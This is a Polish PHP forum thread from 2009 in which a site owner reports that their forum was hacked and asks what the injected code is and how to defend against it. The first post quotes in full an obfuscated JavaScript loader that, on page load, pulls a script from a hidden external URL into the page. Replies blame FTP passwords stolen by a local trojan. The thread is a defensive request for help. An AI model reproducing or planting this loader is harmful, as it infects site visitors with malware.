[JavaScript][HTML]Zabezpieczenia

[JavaScript][HTML]Zabezpieczenia, doklejanie kodu html

kosma Zobacz profil	28.11.2009, 21:48:08 Post #1
Grupa: Zarejestrowani Postów: 44 Pomógł: 0 Dołączył: 11.11.2007 Ostrzeżenie: (0%)	Witam! Otwieram sobie dzisiaj stronę swego forum i strona nie działa - konsternacja... Zaglądam na serwer, ściągam plik index.php gdyż to w nim sygnalizowany jest błąd i widzę, że na jego końcu doklejony jest nieznany mi kod. W katalogach utworzone zostały pliki index.html i w każdym z nich taki oto kod: [HTML] pobierz, plaintext <script>/GNU GPL/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^\|&\|@\|\)\|\(\|#\|\!\|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script> [HTML] pobierz, plaintext Zauważyłem też że pliki javascript (js) też zostały zmodyfikowane lecz nie wiem o co gdyż zdążyłem je podmienić na właściwe zanim pomyślałem aby zerknąć co też zostało w nich doklejone. Proszę mi powiedzieć cóż to jest, jak do tego doszło i jak się przed tym zabezpieczyć? Ten post edytował kosma 28.11.2009, 21:55:10

Odpowiedzi

b4x Zobacz profil	20.12.2009, 02:44:51 Post #2
Grupa: Zarejestrowani Postów: 658 Pomógł: 95 Dołączył: 20.12.2005 Skąd: N54,35° E18,63° (Gdańsk) Ostrzeżenie: (0%)	Teraz każdy znany klient jest zagrożony - nie znam pochodzenie tego syfu. Ale z tego co zauważyłem pliki są podmieniane z komputera ofiary bezpośrednio. na FTP miałem dostęp tylko z 1 IP dopuszczony, a i tak przeszło, szukanie w procesach tego syfu, skanerami itp - nie dawało rezultatów - wszędzie niby 'czysto' - a to i tak dalej siedziało. http://www.michell.pl/bez-kategorii/iframe...nload-function/ Ten post edytował b4x 20.12.2009, 02:47:04

Posty w temacie

kosma [JavaScript][HTML]Zabezpieczenia 28.11.2009, 21:48:08

Blame Zapewne trzymasz hasła w Total Commanderze, z któr... 28.11.2009, 22:02:46

kosma Zgadza się. Dziękuję za odpowiedź choć napędziłeś... 28.11.2009, 22:07:05

darko Wygląda na malware, doklejony do zdarzenia documen... 28.11.2009, 22:17:32

adrianozo Nie dawno miałem to samo tylko trochę inny kod był... 28.11.2009, 22:22:10

b4x Teraz każdy znany klient jest zagrożony - nie znam... 20.12.2009, 02:44:51

trzykas Prosty skrypcik do usuniecia trojana JS-IllRedir-B... 28.01.2010, 02:33:08

ppx Witam, U mnie na serwerze pojawił się Illredir-CB... 9.06.2010, 13:55:44

Sillan Witam, może ktoś wie jak wyłączyć opcje przetrzymy... 18.11.2010, 19:28:53

« Następny starszy · Przedszkole · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 5.10.2025 - 00:48

Hosting zapewnia

Forum PHP.pl